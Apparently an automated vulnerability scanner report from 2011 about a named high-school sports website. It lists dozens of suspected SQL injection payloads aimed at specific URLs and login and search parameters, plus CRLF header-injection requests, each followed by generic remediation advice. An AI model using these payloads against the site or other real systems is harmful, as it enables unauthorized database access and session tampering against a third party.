XSS, Cross Site Scripting in highschoolsports.net, CWE-79, CAPEC-86, DORK, GHDB, HTTP Header Injection, Stored XSS, Blind SQL Injection

Report generated by XSS.CX Home at 2011.08.20, Sat, at 04:02:32 GMT-06:00.

GHDB DORK Report for highschoolsports.net


Host/IP                               High  Medium  Low  Info
www.highschoolsports.net (port 80)    2     1       0    1

Alert Detail

High (Suspicious) MySQL Blind SQL Injection
Description
Blind SQL injection is possible in the MySQL database.
URL http://www.highschoolsports.net/MyAccount
Parameter POST parameter: sign_in_type_2=/*!00000 0*/
Other information The same web page is returned if MySQL comment is added to parameter(s).
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: username=/*!00000 1*/
Other information The same web page is returned if MySQL comment is added to parameter(s).
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: username=/*!00000 1*/
Other information The same web page is returned if MySQL comment is added to parameter(s).
Solution
Do not trust client-side input, even if there is client-side validation. In general:
- If the input string is numeric, type-check it.
- If the application uses JDBC, use PreparedStatement or CallableStatement with parameters passed by '?'.
- If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
- If stored procedures or bind variables can be used, use them for passing parameters into the query. Do not just concatenate strings into the query inside the stored procedure!
- Do not create dynamic SQL queries by simple string concatenation.
- Use the minimum database user privilege for the application. This does not eliminate SQL injection but minimizes its damage. For example, if the application requires reading one table only, grant only that access to the application. Avoid using 'sa' or 'db-owner'.
Reference
- The OWASP guide at http://www.owasp.org/documentation/guide
- http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
- http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
- For Oracle database, refer to http://www.integrigy.com/info/IntegrigyIntrotoSQLInjectionAttacks.pdf

High (Suspicious) SQL Injection
Description
SQL injection may be possible. User-submitted parameters are formulated into a SQL query for database processing. If the query is built by simple string concatenation, it is possible to modify the meaning of the query by carefully crafting the parameters. Depending on the access rights and the type of database used, a tampered query can be used to retrieve sensitive information from the database or execute arbitrary code. MS SQL and PostgreSQL, which support multiple statements, may be exploited if the database access right is more powerful. This can occur in URL query strings, POST parameters or even cookies. Checks on cookies are currently not supported by us. You should also check for SQL injection manually, as some blind SQL injection areas cannot be discovered by this check.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1%20AND%201=1&gender=Boys&lvl=6th&spt=Alpine%2525252520Skiing
Parameter sc_id=-1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%2525252520Skiing
Parameter gender=Boys AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th%20AND%201=1&spt=Alpine%2525252520Skiing
Parameter lvl=6th AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1%22%20AND%20%221%22=%221&genderlevelsport=-1
Parameter sc_id=-1" AND "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&genderlevelsport=-1%20AND%201=1
Parameter genderlevelsport=-1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip'%20AND%20'1'='1
Parameter searchStr=Enter School Name%252C City or Zip' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/?sc_id=-1%22%20AND%20%221%22=%221&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter sc_id=-1" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/?sc_id=-1&gender=Boys&lvl=6th%22%20AND%20%221%22=%221&spt=Alpine%25252520Skiing
Parameter lvl=6th" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/Massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: searchStr=Search+for+a+School' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/Massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: searchStr=Search+for+a+School' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/Massey/state/Wisconsin/Football/Varsity/Boys/2011/
Parameter POST parameter: searchStr=Search+for+a+School' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: gender=Boys OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th'%20AND%20'1'='1&spt=Alpine%25252520Skiing
Parameter POST parameter: lvl=6th' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing%22%20AND%20%221%22=%221
Parameter POST parameter: spt=Alpine%252520Skiing" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: username=1' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: password=' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: sign_in_type=hss" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing
Parameter POST parameter: sign_in_type=stats AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount
Parameter POST parameter: sign_in_type=hss AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/MyAccount
Parameter POST parameter: sign_in_type_2=0" AND "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: password=" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: sign_in_type=hss OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/TermsofService/
Parameter POST parameter: sign_in_type=stats AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th'%20AND%20'1'='1&spt=Alpine%25252520Skiing
Parameter lvl=6th' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/?sc_id=-1&genderlevelsport=-1%20AND%201=1
Parameter genderlevelsport=-1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%20AND%201=1
Parameter searchStr=Enter School Name%252C City or Zip AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Florida/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?forgotPassword=Enter%20your%20email%20address%22%20AND%20%221%22=%221
Parameter forgotPassword=Enter your email address" AND "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%25252520Skiing
Parameter gender=Boys AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th'%20AND%20'1'='1&spt=Alpine%25252520Skiing
Parameter lvl=6th' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/?sc_id=-1&genderlevelsport=-1'%20AND%20'1'='1
Parameter genderlevelsport=-1' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Idaho/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%20AND%201=1
Parameter searchStr=Enter School Name%252C City or Zip OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/
Parameter POST parameter: password=' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Missouri/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys%22%20AND%20%221%22=%221&lvl=6th&spt=Alpine%25252520Skiing
Parameter gender=Boys" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th&spt=Alpine%25252520Skiing'%20AND%20'1'='1
Parameter spt=Alpine%252520Skiing' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?sc_id=-1'%20AND%20'1'='1&genderlevelsport=-1
Parameter sc_id=-1' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%20AND%201=1
Parameter searchStr=Enter School Name%252C City or Zip AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: username=1 AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: password=' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=hss' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/South%25252520Dakota/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?forgotPassword=Enter%20your%20email%20address%20AND%201=1
Parameter forgotPassword=Enter your email address OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys%20AND%201=1&lvl=6th&spt=Alpine%25252520Skiing
Parameter gender=Boys AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?sc_id=-1&gender=Boys&lvl=6th%20AND%201=1&spt=Alpine%25252520Skiing
Parameter lvl=6th AND 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?sc_id=-1&genderlevelsport=-1'%20AND%20'1'='1
Parameter genderlevelsport=-1' AND '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/?searchStr=Enter%20School%20Name%25252C%20City%20or%20Zip%22%20AND%20%221%22=%221
Parameter searchStr=Enter School Name%252C City or Zip" OR "1"="1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/massey/state/Wisconsin/Football/Varsity/Boys/2011/
Parameter POST parameter: sign_in_type=stats' OR '1'='1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
URL http://www.highschoolsports.net/modules/globalModules/navBar.js.cfm?script_name=/TermsofService.cfm%20AND%201=1
Parameter script_name=/TermsofService.cfm OR 1=1
Other information The alert may be invalid if the return page contains random changing contents. If it is the case, you may need to perform the check manually for verification.
Solution
Do not trust client-side input, even if there is client-side validation. In general:
- If the input string is numeric, type-check it.
- If the application uses JDBC, use PreparedStatement or CallableStatement with parameters passed by '?'.
- If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
- If stored procedures or bind variables can be used, use them for passing parameters into the query. Do not just concatenate strings into the query inside the stored procedure!
- Do not create dynamic SQL queries by simple string concatenation.
- Use the minimum database user privilege for the application. This does not eliminate SQL injection but minimizes its damage. For example, if the application requires reading one table only, grant only that access to the application. Avoid using 'sa' or 'db-owner'.
Reference
- The OWASP guide at http://www.owasp.org/documentation/guide
- http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
- http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
- For Oracle database, refer to http://www.integrigy.com/info/IntegrigyIntrotoSQLInjectionAttacks.pdf

Medium (Warning) CRLF injection
Description
A cookie can be set via CRLF injection. It may also be possible to set arbitrary HTTP response headers.
In addition, by carefully crafting the injected response using cross-site scripting, a cache poisoning vulnerability may also exist.
URL http://www.highschoolsports.net/MyAccount/process/addUser.cfm
Parameter POST parameter: type=P&type=A&type=F&type=C&type=S&type=M&coach_type=n&coach_type=s&coach_type=both&email=1&password=&confirmpassword=&zip=1&school_name=1&school_id=-1&to_uploads=0&genderchoice=&DOBmonth=any%3F%0D%0ASet-cookie%3A+Tamper%3D8961766276418917161&DOBday=&DOByear=&pref_market=
URL http://www.highschoolsports.net/MyAccount/process/addUser.cfm
Parameter POST parameter: type=P&type=A&type=F&type=C&type=S&type=M&coach_type=n&coach_type=s&coach_type=both&email=1&password=&confirmpassword=&zip=1&school_name=1&school_id=-1&to_uploads=0&genderchoice=&DOBmonth=&DOBday=any%0D%0ASet-cookie%3A+Tamper%3D8961766276418917161&DOByear=&pref_market=
URL http://www.highschoolsports.net/MyAccount/process/addUser.cfm
Parameter POST parameter: type=P&type=A&type=F&type=C&type=S&type=M&coach_type=n&coach_type=s&coach_type=both&email=1&password=&confirmpassword=&zip=1&school_name=1&school_id=-1&to_uploads=0&genderchoice=&DOBmonth=&DOBday=&DOByear=any%3F%0D%0ASet-cookie%3A+Tamper%3D8961766276418917161&pref_market=
Solution
Type-check the submitted parameters carefully. Filter CRLF from input so that it cannot be injected.
Reference
- http://www.watchfire.com/resources/HTTPResponseSplitting.pdf
- http://webappfirewall.com/lib/crlf-injection.txt
- http://www.securityfocus.com/bid/9804

Informational (Suspicious) Potential File Path Manipulation
Description
There is possibly a file path in the parameter. You should try manual manipulation to check whether it can lead to information exposure, such as system files or program source code. In that case the risk would be high.
URL http://www.highschoolsports.net/modules/globalModules/navBar.js.cfm?script_name=/TermsofService.cfm
Parameter script_name=/TermsofService.cfm
Other information The file path that triggers the alert is: /TermsofService.cfm
Solution
Make sure the file path parameter cannot be manipulated to read arbitrary files. Restrict access to intended files only.
Reference
Nil